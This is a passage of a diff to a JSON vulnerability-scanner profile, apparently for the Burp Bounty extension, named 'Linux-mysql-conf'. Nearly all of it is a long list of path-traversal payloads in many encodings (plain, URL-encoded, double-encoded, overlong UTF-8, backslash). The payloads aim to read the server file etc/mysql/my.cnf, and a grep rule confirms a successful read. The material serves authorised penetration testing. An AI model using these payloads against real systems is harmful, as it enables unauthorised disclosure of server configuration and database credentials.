\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","./../{FILE}","./.././../{FILE}","./.././.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}",".\\..\\{FILE}",".\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}","../{FILE}","../..//{FILE}","../..//../{FILE}","../..//../..//{FILE}","../..//../..//../{FILE}","../..//../..//../..//{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//../..//{FILE}","..\\{FILE}","..\\..\\\\{FILE}","..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..///{FILE}","../..///{FILE}","../..//..///{FILE}","../..//../..///{FILE}","../..//../..//..///{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..///{FILE}","..\\\\\\{FILE}","..\\..\\\\\\{FILE}","..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,MySQL database server"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-mysql-conf","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Linux-mysql-conf: \u003cbr\u003e \u003cgrep\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/mysql/my.cnf","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Linux-mysql-conf",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@Sy3Omda",
+ "Payloads": [
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66{FILE}",
